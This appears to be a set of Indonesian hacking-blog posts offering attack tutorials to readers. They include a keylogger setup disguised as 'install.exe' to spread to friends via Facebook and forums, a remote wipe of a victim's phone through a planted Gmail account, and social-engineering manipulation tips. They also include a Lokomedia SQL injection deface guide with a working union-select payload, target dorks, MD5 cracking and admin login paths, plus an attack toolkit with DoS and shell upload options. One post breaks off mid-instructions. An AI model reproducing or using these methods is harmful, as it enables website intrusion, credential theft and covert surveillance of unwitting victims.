March 2019


Assalamualaikum wr.wb
Terima kasih buat kalian yang sudah mengunjungi web ini,

Pada kesempatan kali ini saya akan berbagi tentang Tool/Program untuk melakukan pentesting dan vulnerability scanning.

Simak baik2 ya,

*https://github.com/Anon6372098/FazScan*

Tool/Program untuk melakukan pentesting dan vulnerability scanning.

Opsi Tersedia v1.1 :

1. SQL Injection Pentester (SQL Injection Secara Cepat)
2. Common SQLi Vulnerability Scanner
3. Advanced SQLi Vulnerability Scanner
4. Common Web Vulnerability Scanner
5. Web CMS WordPress Vulnerability Scanner
6. Web CMS Magento Vulnerability Scanner
7. Web CMS Joomla Vulnerability Scanner
8. Web CMS Lokomedia Vulnerability Scanner
9. Web CMS Drupal Vulnerability Scanner + Shell Uploader
10. Automated Open Port Scanner
11. Denial of Service Attack
12. Dork Scanner
13. Admin Page Detector (7475 Pages Will be Scanned)
14. About the Programmer
15. Exit the Program

Cara Install :

*Android (Termux)*

pkg update && pkg upgrade
pkg install perl
pkg install git
git clone https://github.com/Anon6372098/FazScan
cd FazScan
sh installpm.sh (jika menanyakan opsi, tulis local::lib)
perl fazscan.pl

*Kali Linux (Terminal Kali Linux)*

apt-get update
apt-get install perl
apt-get install git
git clone https://github.com/Anon6372098/FazScan
cd FazScan
sh installpm.sh (jika menanyakan opsi, tulis local::lib)
perl fazscan.pl

atau

sudo apt-get update
sudo apt-get install perl       
sudo apt-get install git
git clone https://github.com/Anon6372098/FazScan
cd FazScan
sh installpm.sh (jika menanyakan opsi, tulis local::lib)
perl fazscan.pl

*Windows (CMDer)*

(PowerShell as Admin)

Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

choco install perl
choco install git
git clone https://github.com/Anon6372098/FazScan
cd FazScan
sh installpm.sh (jika menanyakan opsi, tulis local::lib)
perl fazscan.pl

Jika ada module yang belum terinstall/error, cukup jalankan perintah :

• cpan install nama_module

Instalasi mungkin akan sedikit lama, tunggu saja.

Share Jika menurut kallian bermanfaat,
Berbagi itu indah๐Ÿ˜œ๐Ÿ˜‚
Assalamualaikum wr.wb
Kembali lagi bersama kami PHL[pemalang hacker link)
kali ini saya akan kasih tau cara membuat halaman login ditermux,


Simak dengan teliti ya

Maksud nya gimanasi Cara Membuat Login ? 
Jadi Jika kalian masuk ke aplikasi termux nanti akan di minta User Dan Password, Ya intinya si untuk keamanan termux kalian.

Oke langsung saja ke tutorial nya :

1. Seperti biasa kalian lakukan proses update dan upgrade terlebih dahulu, Caranya :

$ apt update && apt upgrade

2. Selanjutnya kalian lalkuka proses penginstallan, Saya singkat saja ya supaya kalian gampang, Caranya :

$ pkg install nano ruby figlet python2 git -y
$ gem install lolcat 

3. Sekarang kita lakukan proses kloning, Caranya :

$ git clone https://github.com/Harisgitama/termux-loginv2fx.git

4. Buka direktori/file nya, Caranya :

$ cd termux-loginv2fx
$ ls

5. Sekarang kalian jalankan file nya, Caranya :

$ python2 setup.py
$ cd $HOME

6. Nah sekarang kita buat data login termux kita, Caranya :

$ python2 useradd.py

Setelah kalian selesai membuat datanya nanti kalian buka sesion baru, Nanti otomatis akan meminta User Dan Password

NOTE

- Jika User Dan Password nya salah kalian tidak bisa menjalankan perintah termux kalian.

- Jangan sampai lupa User Dan Password kalian Jika lupa maka harus hapus data untuk masuk ke aplikasi termux lagi.

Oke sekian dulu ya,
Terima kasih sudah mengunjungi blog kami 

Tutorial Lainya Bisa Kalian Cek Disini 


Cara merekam aktifitas keyboard


Keylogger adalah aplikasi yang bisa merekam aktifitas pengguna komputer. Berasal dari kata kerja “log”. Orang/program yang melakukan aktifitas log ini namanya “logger”. Sedangkan “logging” berarti adalah istilah untuk kegiatan “merekam” aktifitas log-nya. Yaaah…. bahasa inggris gitu deh. Hehehe.. 
Banyak metode untuk merekam aktifitas pengguna komputer… Ada yang berdasarkan key stroke (rekaman langsung semua kata yang dipencet di keyboard), ada yang memantau clipboard Windows (yang pake Windows nih..), ada juga keylogger yang secara terang-terangan memiliki interface yang cantik, padahal ternyata menipu. Dan mungkin masih banyak lagi cara-cara “logging” aktifitas pengguna dengan memanfaatkan keylogger. Langsung ke praktek yuyayu..?!
Sebelumnya, ada alasan mengapa saya menulis tentang keylogger ini. Saya mengutip pembicaraan seorang ahli keamanan komputer yang menjelaskan kurang lebih begini:
“Keylogger adalah aplikasi yang bisa merekam password yang di ketik oleh pengguna”.
Pernyataan ini sedikit menggelitik bagi saya. Ya, padahal itu adalah salah satu penerapan dari keylogger! Tapi bukan itu saja yang bisa dilakukan keylogger

di sini saya menggunakan software syslogger
software nya bisa di download di -->syslogger

keylogger ini sangat ringan dan stabil

ok langsung aja settinganya

disini kelebihan syslogger terdapat 2 metode pengiriman log yang pertama menggunakan email dan yang kedua menggunakan ftp . tapi kali ini saya akan menggunakan email saja

setting email kalian dan password email nya
disini saya menggunakan gmail
 
setelah di setting klik test apabila berhasil email tsb bisa digunakan



 nb: kalau gmail kalian menggunakan authentication mobile maka gagal alias log tidak bisa di kirim ke email kalian

setelah itu settingan log nya atur waktu dan efek nya disini saya akan mengatur waktu tiap 15 menit log akan terkirim ke email saya




kalian juga bisa menambahkan efek properties buat ketergan manipulasi nya seperti ganti icon dan assemblynya

setelah itu klik build server untuk hasil terkahirnya lalu simpan dengan nama terserah anda disini saya kasih nama install.exe


nah sekarang file tersebut bisa di sebarkan ke teman atau di internet tentunya dengan manipulasi se kreatif kalian . Bisa lewat forum,download,facebook,dll



hasil dari lognya



 software ini juga di lengkapi obat penawar nya loh
barangkali hasil keyloggernya di coba di pc sendiri

Retas Instagram???
๐Ÿ˜๐Ÿ˜๐Ÿ˜

Halo sobat phl, kembali lagi dengan kami di pembahasan tentang hacking, disini kami akan men-share ke kalian bagaimana si?, Cara nya hack Bae meretas Instagram mantan nya?? ๐Ÿ˜‚...
Mau tahu??, Simak yuk

Bahan Bahan :
1. Aplikasi termux (Klik). ( Jika kamu user handphone ya)
2. Internet pastinya.
3. Script hack nya ๐Ÿฅฐ (Klik).

Cara nya :
1. Buka aplikasi termux.
2. Tunggu loading ( jika baru install ya ).
3. Masukan perintah berikut ini

Hallo Sahabat Pemalang Hacker Link..


  




Pada artikel ini saya akan memberitahu kalian Pengertian Front-End, Back-End, dan Full-Stack.  

 Apa itu Front-End, Back-End, dan Full-Stack??. 


Front-End

   Front-End  adalah bagian dari sebuah websit yang langsung dilihat oleh penggunaPengguna juga bisa langsung berinteraksi pada bagian ini. Bagian ini dibangun menggunakan HTML, CSS, dan JavaScript.


  Front-end developer menggunakan HTML, CSS, dan JavaScript untuk membuat website. Mereka menciptakan design website dan kemudian membuat website tersebut dapat berfungsi.

Back-End

   Back-End adalah bagian belakang layar dari website. Bahasa pemograman yang digunakan diantaranya adalah PHP, Ruby, Python, MySQL dan masih banyak lainnya.

Untuk membangun sebuah website yang berjalan dengan baik, back-end developer biasanya bekerjasama dengan front-end developer.

Full-Stack

   Full-stack developer adalah mereka yang bekerja pada bagian front-end dan back-end. Mereka menguasai HTML, CSS, JavaScript, dan satu atau lebih bahasa pemograman back-end.
Jadi Full-Stack Developer itu berat, Kamu gak akan kuat. Hehehe

Oke sekian dari saya.
Terima kasih telah berkunjung
Apa itu Soceng???



Soceng … sebuah kata yang aneh bagi teman2 yang baru mendengarnya Mungkin cuma plesetan atau lawakan ajaa, tapi ternyata soceng menjadi disiplin ilmu yang penting di dunia IT. Apa sih sebenernya .. ayo kita bahas .. ^_^..
Soceng adalah sebuah singkatan dari social engginering. sebuah disiplin ilmu IT dalam bidang keamanan. soceng sering dikaitkan dengan manusia. kenapa ..??
banyak yang mengklaim bahwa manusia adalah rantai terlemah dalam sebuah sistem. manusia menjadi target utama dalam teknik soceng ini, karena tidak ada jaringan komputer yang tidak melibatkan manusia. karena sehebat apapun teknologi yang diterapkan, akan tetap kebobolan dengan kendali seorang network admin yang kurang handal.
nah sampai sini, ada bayangan kan tentang apa itu soceng ..??, definisi ane ..
soceng adalah sebuah teknik memperoleh informasi dengan cara menipu korban. korban disini bisa saja user, admin, operator, member, dan lain-lain. manusia menjadi celah kelemahan yang bersifat umum atau universal. Tidak memandang server, software, hardware, sistem operasi, platform, protokol, dan lain-lain.
dewasa ini model soceng kian beragam, pada awalnya hanya sebuah teknik yang menggunakan telepon atau handphone saja. Namun seiring berjalannya waktu teknik ini semakin berkembang. Internet adalah salah satu sarananya.
teknik soceng biasa digunakan attacker untuk mendapatkan informasi yang ia butuhkan dari sebuah perusahaan. hal ini menjadi lumrah ketika sebuah perusahaan yakin dengan infrasktruktu teknologi yang hebat akan melindungi data rahasia perusahaan. banyak metode yang digunakan, antara lain :
1. datang langsung ke perusahaan.
banyak yang menggunakan teknik ini dengan kepercayaan diri yang tinggi. dengan meyakinkan bahwa ia adalah rekanan, konsultan, atau audit maka dengan mudah seorang attacker bisa masuk kedalam sistem perusahaan dan mengambil informasi yang ia butuhkan. sebuah kisah nyata dari Kapil Raina, seorang ahli keamanan di VerySign.
Suatu pagi di beberapa tahun yang lalu, sekelompok orang berjalan memasui sebuah perusahaan jasa pengiriman yang tergolong besar. Beberapa saat kemudian mereka berjalan keluar dari gedung itu dan telah berhasil mendapatkan ak akses ke sistem jaringan perusahaan. bagaimana mereka melakukannya ..?
Pertama, mereka telah melakukan riset mengenai perusahaan itu selama 2 hari sebelumnya. Sebagai contohnya, mereka telah mempelajari nama-nama pejabat berpengaruh di perusahaan itu dengan cara menghubungi pihak HRD. Selanjutnya mereka berpura-pura kehilangan kunci ketika berada di pintu depan perusahaan, dan ternyata seorang pria di perusahaan tadi membukakan pintu untuk mereka tanpa curiga. Untuk saat itu mereka telah berhasil memasuki gedung sasaran. Sampai di lantai 3 yang merupakan secure area, mereka berpura-pura kehilangan tanda identitas. Cukup melakukan akting kehilangan dengan bagus, senyum ke pekerja-pekerja yang ada, dan salah satu dari mereka membukakan pintu dengan ramah.
Mereka sudah tahu bahwa saat itu pemimpin perusahaan sedang bertugas keluar kota, jadi mereka bisa dengan bebas memasuki ruang kantornya dan mendapatkan data finansial dari komputernya yang ternaya tidak dipassword. Mereka kemudian memanggila petugas kebersihan dan meminta untuk meletakan semua sampah perusahaan di suatu tempat dimana mereka nantinya bisa memeriksa karena beberapa karyawan ternyata suka menuliskna informasi rahasia atau passwod ke kertas lembar kerja yang tidak terpakai dan ekmudian membuang begitu saja.
Selain hal-hal diatas, mereka pun telah mempelajari bagaimana cara dan gaya sang pemimpin berbicara, sehingga mereka mampu menelpon dan mengaku sebagai pemimpin perusahaan, yang sebenanrnya sedang bertugas keluar kota, lalu mengatakan sedang dalam keadaan terburu-buru dan lupa akan passwordnya. Sang admin pun tanpa rasa curiga dan tanpa merasa perlu memverifikasi, segera memberikan apa yang dibutuhkan. Denga mamakai teknik standar, mereka akhirnya mendapatkan akses super-user di sistem jaringan perusahaan tersebut.
2. Dumpter Diving
Dumpter Diving Atau disebut trashing adalah metode populer, yaitu attacker mengumpulkan informasi dengan memeriksa sampah perusahaan sasaran. Ada banyak informasi yang bisa didapatkan seorang attacker dari sampah perusahaan selama sampah itu bukan sampah makanan ^^/. Buku telepon, kalender, dan catatan kerja merupakan salah satu informasi penting.
3. Telepon (membuat situasi palsu)
Cara ini adalah dengan menciptakan situasi palsu dimana seseorang menjadi bagian dari situasi tersebut. Penyerang bisa membuat alasan yang menyangkut kepentingan pihak lain atau bagian lain dari perusahaan itu, misalnya. Ini memerlukan kerja lanjutan bagi penyerang untuk mencari informasi lebih lanjut dan biasanya juga harus mengumpulkan informasi tambahan tentang ‘target’. Ini juga berarti kita tidak harus selalu berbohong untuk menciptakan situasi tesebut, kadangkala fakta-fakta lebih bisa diterima oleh target.
Sebagai contoh seperti ini: seorang berpura-pura sebagai agen tiket yang menelepon salah satu pegawai perusahaan untuk konfirmasi bahwa tiket liburannya telah dipesan dan siap dikirim. Pemesanan dilakukan dengan nama serta posisi target di perusahaan itu, dan perlu mencocokkan data dengan target. Tentu saja target tidak merasa memesan tiket, dan penyerang tetap perlu mencocokkan nama, serta nomor pegawainya. Informasi ini bisa digunakan sebagai informasi awal untuk masuk ke sistem di perusahaan tersebut dengan account target. Contoh lain, bisa berpura-pura sedang mengadakan survei hardware dari vendor tertentu, dari sini bisa diperoleh informasi tentang peta jaringan, router, firewall atau komponen jaringan lainnya.
4. Koneksi Internet
ketika seorang pekerja sedang melakukan koneksi internet, tiba-tiba sebuah pop-up windows muncul dan mengatakan bahwa koneksinya terputus dan harus kembali melakukan login. Tanpa curiga, pekerja tadi akan melakukannya. Semudah itu attacker mendapatkan informasi.
Pengiriman email juga sering dilakukan karena email menjadi sarana yang dapat dipercaya korban. Misalnya dengan memberitahukan bahwa attachment file yang disertakan merupakan patch sistem operasi yang harus segera dijalankan. User mungkin tidak curiga dan tidak perlu melakukan verifikasi karena merasa email itu berasal dari vendor sistem operasi yang digunakan. Atau mungkin emial dengan attachment yang disisipi worm atau trojan horse untuk membuat backdoor di sistemnya. Kita juga bisa sisipkan worm bahkan dalam file .jpg yang terkesan “tak berdosa” sekalipun.
5. Pendekatan psikologis
Selain cara-cara diatas, seorang attacker menggunakan langkah-langkah psikologis untuk mendapatkan informasi, yaitu dengan mengadakan sebuah ikatan emosional dalam tujuan mendapatkan kepercayaan, atau seperti yang pernah kevin Mitnick katakan, “That is the whole idea, to create a sense of trust and then exploiting it“, misalnya dengan menjalin suatu hubungan dengan memacari sekretaris pemimpin dari perusahaan. Dia lalu akan memberikan kesan sebagai orang yang bisa dipercaya dan lambat laun bukan hanya rahasa sekretaris, namun rahasia perusahaan ia dapatkan.
Attacker bisa melakukan berbagai hal untuk sekedar menarik simpati atau menjalin hubungan dengan orang-orang yang dianggap bisa menjadi jalan untuk mencapai tujuannya.
salah satu contoh bentuk Social Engginering dengan metode Pendekatan psikologis bisa teman-yeman lihat disini, Contoh Pendekatan Psikologis.

Cara-cara tersebut biasanya melibatkan faktor personal dari target: kurangnya tanggung jawab, ingin dipuji dan kewajiban moral. Kadang target merasa bahwa dengan tindakan yang dilakukan akan menyebabkan sedikit atu tanpa efek buruk sama sekali. Atau target merasa bahwa dengan memenuhi keinginan penyerang-yang berpura-pura akan membuat dia dipuji atau mendapat kedudukan ynag lebih baik. Atau dia merasa bahwa dengan melakukan sesuatu akan membantu pihak lain dan itu memang sudah kewajibannya untuk membantu orang lain.
Jadi kita bisa fokuskan untuk membujuk target secara sukarela membantu kita, tidak dengan memaksanya. Selanjutnya kita bisa menuntun target melakukan apa yang kita mau, target yakin bahwa dirinya yang memegang kontrol atas situasi tersebut. Target merasa bahwa dia membuat keputusan yang baik untuk membantu kita dan mengorbankan sedikit waktu dan tenaganya. Semakin sedikit konflik semakin baik. kopral garenx seorang penguasa hacker.
Riset psikologi juga menunjukkan bahwa seorang akan lebih mudah memenuhi keinginan jika sebelumnya sudah pernah berurusan, sebelum permintaan inti cobalah untuk meminta target melakukan hal-hal kecil terlebih dahulu.
Referensi :
ilmukomputer.org
id.wikipedia.org/wiki/Social_engineering_(keamanan)

Shell Backdoor


​Backdoor dalam computer security system , merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses login atau proses autentikasi lainnya).Awalnya Backdoor dibuatoleh para programer komputer sebagai mekanismeyang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi.
Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award ), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs. Backdoor yang ia ciptakan itu melindungi dirinya dari pendeteksian dan pembuangan dari sistem, meskipun pengguna berhasil menemukannya, karena memang backdoor ini membuat dirinya sendiri kembali (melakukan rekompilasi sendiri).
“Backdoor merupakan akses khusus yang dibuat oleh
seorang programmer untuk dapat masuk ke dalam
sistem. Tidak semua programmer mengerti setiap
perintah yang terdapat di dalam sistem operasi. Di
dalam sistem operasi seorang programmer memasukkan
perintah-perintah tertentu. Dari perintah-perintah
inilah seorang hacker dapat melewati perintah-
perintah yang harus dilalui apabila seseorang
memasuki suatu sistem operasi tapi kode-kode yang
disisipkan tersebut tidak mempengaruhi kinerja sistem
operasi.”
( Hacker Dictionary, Dony Ariyus )
Backdoor juga bisa dibilang jalan alternatif untuk
masuk ke sebuah sistem tanpa diketahui oleh operator
sistem. Backdoor biasanya dibuat untuk jaga-jaga
kalau saja pintu masuk utama ke dalam sistem error.
Backdoor juga bisa dibuat diluar sistem, biasanya para
peretas yang membuatnya, supaya dapat mengakses
data sistem tanpa memasuki pintu utama sistem.
         

Meretas Perangkat Android??




Hai sobat phl, disini saya akan menjelaskan ke kalian semua bagaimana caranya Chanel hackbae meretas handphone pada video terbarunya bagi kalian yang ingin lihat video nya bisa klik disini, dia meretas handphone penipu memakai teknik soceng, soceng itu apa sih kak?, Nanti saya akan menjelaskan setelah artikel ini terbit besok atau nanti hehe :), ok langsung saja ke intinya.

Bahan Bahan :

1. Hp Korban ( wajib yah ๐Ÿ˜‚)
2. Keahlian soceng ( Social Engineering )
3. Akun Gmail yang kita buat untuk menjebak penipu nya ๐Ÿ˜‚

Nah, kalau sudah ada semua langsung aja kita ke tutorial ya sobat phl hehe.

1. Buat akun Gmail baru untuk menjebak korban, udah tahu kan caranya buat akun gmail?, Kalau belum tahu search dulu di google yah wkwk,

2. Kalau sudah kalian kasihkan akun Gmail kalian ke korban,

3. Tunggu korban masuk ke akun Gmail kalian

4. Kalau sepertinya sudah masuk, kalian masuk ke link ini,
Tampilan screen shoot :
Keterangan :
Warna Hijau = Hapus Perangkat Korban
Warna Kuning = Informasi Baterai + Jaringan
Warna Merah = Indormasi letak korban
Warna Biru = Jumlah perangkat yang masuk

Bila kalian ingin menghapus perangkat nya maka kalian klik yang berwarna hijau itu, terus kalian masukan password kalian, 

Setelah itu konfirmasi kan

Klik Hapus Perangkat
Dan boom!
 pasti korban akan kebingungan wkwk, gunakan cara ini kalau kalian sudah terdesak yah,
See you next time.....


Apa itu hack, Hacking, dan Hacker?

Peretasan adalah penggunaan sumber daya komputer dan jaringan secara tidak sah. (Istilah "hacker" pada awalnya berarti programmer yang sangat berbakat. Dalam beberapa tahun terakhir, dengan akses yang lebih mudah ke beberapa sistem, sekarang memiliki implikasi negatif.) 
Peretas Komputer telah ada selama bertahun-tahun. Sejak Internet menjadi banyak digunakan di Dunia, Kami sudah mulai mendengar lebih banyak tentang peretasan. Hanya beberapa peretas, seperti Kevin Mitnick, yang terkenal. 
Di dunia Hitam dan Putih, mudah untuk menggambarkan Peretas yang khas. Namun dunia digital memiliki banyak jenis peretas.

HACKERS?
Peretas adalah manusia seperti kita semua dan karena itu, adalah individu yang unik, sehingga profil yang tepat sulit untuk diuraikan. Deskripsi luas terbaik tentang Peretas adalah bahwa semua Peretas tidak sama. Setiap Peretas memiliki Motif, Metode, dan Keterampilan. Tetapi beberapa karakteristik umum dapat membantu Anda memahaminya. Tidak semua peretas adalah AntisosialApapun, Peretas ingin tahu tentang Mengetahui hal-hal baru, Berani untuk mengambil langkah dan mereka sering sangat berpikiran tajam.
Hacker  adalah kata yang memiliki dua arti:
1. Secara tradisional, seorang Peretas adalah seseorang yang suka bermain dengan Perangkat Lunak atau Sistem Elektronik. Peretas menikmati Menjelajahi dan Mempelajari bagaimana sistem komputer beroperasi. Mereka suka menemukan cara baru untuk bekerja secara elektronik.
2. Baru-baru ini, Hacker telah mengambil arti baru - seseorang yang dengan jahat membobol sistem untuk keuntungan pribadi. Secara teknis, para penjahat ini adalah Kerupuk sebagai Peretas Pidana. Kerupuk membobol sistem dengan niat jahat.

Hacker Vs. Cracker:

Apa Perbedaan Antara Hacker dan Cracker?
Banyak artikel telah ditulis tentang perbedaan antara Hacker dan cracker, yang berupaya untuk memperbaiki kesalahpahaman publik tentang peretasan. Selama bertahun-tahun, media telah menerapkan kata Hacker ketika itu benar-benar berarti Cracker. Jadi publik sekarang percaya bahwa seorang Peretas adalah seseorang yang membobol sistem komputer dan mencuri data rahasia. Ini sangat tidak benar dan merupakan penghinaan bagi beberapa peretas paling berbakat kami.
HACKER:
Seorang Hacker adalah orang yang tertarik pada pekerjaan sistem operasi komputer apa pun. Paling sering, Hacker adalah pemrogram. Hacker memperoleh pengetahuan lanjutan tentang sistem operasi dan bahasa pemrograman. 
Mereka mungkin mengetahui berbagai lubang keamanan dalam sistem dan alasan lubang tersebut. Hacker terus mencari pengetahuan lebih lanjut, membagikan apa yang telah mereka temukan, dan mereka tidak pernah memiliki niat untuk merusak atau mencuri data.

CRACKER:
Cracker adalah orang yang membobol sistem orang lain, dengan niat jahat. Cracker mendapatkan akses tidak sah, menghancurkan data penting, menghentikan layanan yang disediakan oleh server, atau pada dasarnya menyebabkan masalah bagi target mereka. Cracker dapat dengan mudah diidentifikasi karena tindakan mereka berbahaya. 
Apa pun masalahnya, kebanyakan orang memberi gambaran negatif kepada Hacker. Banyak peretas jahat adalah pencuri elektronik. Seperti halnya siapa pun yang bisa menjadi pencuri, atau perampok, siapa pun bisa menjadi Peretas, tanpa memandang usia, jenis kelamin, atau agama. Keterampilan teknis Peretas bervariasi dari satu ke yang lain. Beberapa peretas nyaris tidak tahu cara berselancar di Internet, sementara yang lain menulis perangkat lunak yang menjadi sandaran peretas lainnya.
Jenis-jenis hacker:
1.
Script Kiddies
2.
Ethical Hacking
3.Black Hat Hackers
4.White Hat Hacker5.Grey Hat Hackers6.Hactivism
7.Cyber Terrorist

Penasaran dengan pengertian macam-macam hackers?
tunngu postingan dari kami ya,,,

terima kasih sudah mampir๐Ÿ™




Google Dork
Hai guys, kembali lagi di blog terkece terkeren terhitz se Indonesia, Jadi disini saya akan memberikan ilmu lagi kepada kalian yang belum tahu apa itu Google Dork, yang di artikel ini itu sangat penting bagi kalian yang ingin belajar Deface website, kalian harus tahu macam macam Google Dork , Ok langsung aja ke artikel nya


Macam Macam Google Dork :

1. inurl: seperti namanya, inurl berarti “di url” atau “dalam url” gunanya untuk mencari website yang di url-nya terdapat suatu string atau kata yang kita masukkan. Contoh: inurl:.blogspot maka yang akan muncul adalah site-site yang di urlnya mengandung “.blogspot” Sedangkan saudaranya inurl adalah “allinurl:”, maksudnya command tersebut digunakan untuk mencari keseluruhan nama domain website yang telah kita input/tentukan.

2. intitle: seperti namanya, intitle berarti “di judul” atau “dalam judul” fungsinya untuk mencari site yang artikelnya memuat judul sesuai yang kita inginkian. Contohnya di sini saya bikin dork intitle:”hack” hasilnya site yang judul postnya mengandung kata “hack” muncul. Intitle juga punya saudara lho :v sama seperti inurl, yaitu “allintext:” namun command tersebut tidak terlalu berpengaruh terhadap hasil pencarian, malah menurut saya memakai “intext:” lebih menguntungkan.

3. intext: nah kalau yang satu ini sifatnya lebih universal(umum) perintah ini sendiri artinya “di teks” atau “dalam teks” jadi, jika misalnya kita memasukkan dork intext:”avenged” di kotak pencarian google maka yang muncul adalah site yang mengandung kata “avenged” entah itu di url, judul, dll. Pokoknya semua yang mengandung kata “avenged” ditampilkan.

4. filetype: berarti “tipe file” kalo yang ini biasanya jarang dipake untuk heking-hekingan karena biasanya perintah ini buat donlot/nyari file dengan lebih spesifik sesuai kebutuhan kita seperti kalau kita sedang mencari lagu/ebook(nanti saya jelaskan di bawah) dan disini saya ambil contoh intext:”hacking” filetype:pdf maka hasil yang keluar adalah sekumpulan file pdf siap donlot dan karena saya kasih intext:”hacking” maka munculnya yang mengandung kata-kata/bertopik tentang “hacking”.

5. site: kalau yang ini berfungsi untuk mencari (Country domain) site yang kita tentukan, perintah ini juga sering digunakan sama heker untuk nentuin site negara mana yang pengen dia bobol dengan memasukan domain negaranya. Misalnya anda mau belanja online di webshop amerika maka dork yang harus anda buat kurang lebih seperti ini intext:”shop” site:.us.
Sebenernya gak harus .us tapi karena di sini contoh yang saya buat adalah site amerika, maka tentu saja domainnya adalah .us kalo misalnya site inggris ya site:.uk kalo misalnya site kanada ya site:.ca sebenernya perintah site: bisa digantikan dengan inurl: contohnya jika anda mau buka situs Dell inggris(uk) nah anda mungkin akan menulis inurl:dell site:.uk tapi anda juga bisa menggantinya jadi inurl:dell.co.uk. Namun jika kita hubungkan ke hal yang berbau carding,deface,dll. “inurl”: lebih sering digunakan untuk menentukan/mencari nama direktori website tersebut untuk diserang dan juga bisa menentukan ekstensi halaman, juga parameter.

link: kalau ini saya kurang paham, karena jujur ane sendiri sama sekali belum pernah make yang beginian, tapi menurut blog tetangga, perintah ini gunanya mencari keseluruhan link yang berada dalam satu website. o.O saya gagal paham terlebih lagi gak ada contohnya.
Nah setelah tau fungsinya kini saatnya anda coba mengembangkan dork sendiri ๐Ÿ˜€ jangan terus-terusan nyari di Mbah Google “Dork Carding” atau “Dork com_user” atau “Dork deface exploit joomla” dll. karena semua dork yang ada di Google itu PASARAN dan yang pasti gak cuma anda yang lihat kumpulan dork itu juga yang pasti dork pasaran itu gak “Fresh” atau gak “Perawan” karena sudah dipakai banyak orang selain anda.
Disini saya kasih satu contoh penggabungan/pengembangan dork, langkah pertama adalah IMAJINASI  seperti, anda mau lihat lirik lagu avenged-hail to the king di kapanlagi.com maka dork yang anda tulis kurang lebih inurl:kapanlagi intext:”avenged” “lirik” intitle:”hail to the king”
Dari contoh dork yang tadi (saat dimasukkan ke kotak pencari Google) seolah-olah anda berbicara dengan Google kurang lebih seperti ini: “Oy gel, gugel.. cariin gue site yang urlnya ada kata kapanlagi terus di situ ada tulisan avenged sama lirik nah terus judulnya hail to the king” nah seperti itulah gambaran sederhananya ๐Ÿ˜€ jika anda mencari di Google “Cara mengembangkan dork” maka saya jamin yang muncul Just Bullshit Tutorial, karena kunci mengembangkan dork hanyalah IMAJINASI. Maka anda harus imajinasikan dulu anda mau ngomong gimana sama google, terus baru di jadiin dork.
Sebenernya dork fungsinya gak hanya untuk kejahatan tapi juga bisa sangat bermanfaat untuk beberapa hal positif.
Oke..oke sekian dulu artikel saya ๐Ÿ˜€ jari saya juga dah gempor gara-gara ngetik ๐Ÿ˜€ ๐Ÿ˜€ tidak lupa saya ucapkan Terima Kasih kepada para pengunjung blog sederhana saya ๐Ÿ˜€ oke sekian.
Terima Kasih.
Cara Deface POC Lokmed
Hai guys, kembali lagi di blog terkece terkeren terhitz di Indonesia :v, eh malah kek atta :v, Ok lah tanpa basa basi kita langsung aja ke tutor nya

Bahan - Bahan :
1. Internet
2. Hp / Laptop

Ok guys kalau sudah ada bahan bahan nya langsung aja ke TKP...

Dorking dulu ya bos kalau belum tahu Dorking itu apa nanti saya upload ketika artikel ini sudah di upload

Dork :
- inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html

Bagi kalian yang sudah tahu apa itu Google Dork bisa kalian kembangin lagi, saya cuman memberikan default nya, ok?

Kalau sudah ketemu target kita eksekusi menggunakan Exploit berikut ini
'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Bagi kalian yang tidak tahu cara memasukan Exploit nya seperti apa bakalan saya ajarin jadi seperti di bawah ini..
Misal kalian nemuin web/target kek gini website.co.li/statis-1-tentang.html
Nah kita masukin Exploit nya itu di bagian sesudah angka satu itu, nah kalau angka nya beda gimana bang?, Ya nggak papa lu masukin aja Exploit nya di depan angka itu seperti berikut ini
website.co.li/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-tentang.html
Nah seperti itu caranya,

Nah kelanjutan nya gimana bang?
Ok langsung aja langkah selanjutnya
Kalau sudah kalian lakukan cara diatas langkah selanjutnya adalah kalian view-source website nya yang tadi menggunakan ctrl+u / view-source: website.co.li

Disini saya menggunakan hp jadi pakai chrome caranya
view-source:website.co.li/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-tentang.html

Maka akan muncul seperti gambar berikut ini
Nah di title nya itu kan ada text + md5 Jadi yang text itu user name nya dan md5 nya itu password nya, terus gimana caranya bang supaya kita tahu apa isi password nya
Kalian tinggal masuk ke website di bawah ini
https://www.md5online.org/md5-decrypt.html
Kalian masukan hash nya
Terus akan muncul text berwarna hijau seperti di bawah ini
Nah yang Found : ftik3nc4n4007 
Itu Password nya, nah gimana cara kita login?
Disini kita bermain feeling :v
Ea feeling
Admin page default nya sih disini
1. web.co.li/index.php/adminweb
2. web.co.li/redaktur
3. we.co.li/administrator
4. web.co.li/adminweb
5. web.co.li/admin

Nah kalian tinggal login deh
Dan boom
Selamat kalian sudah masuk ke dalam server nya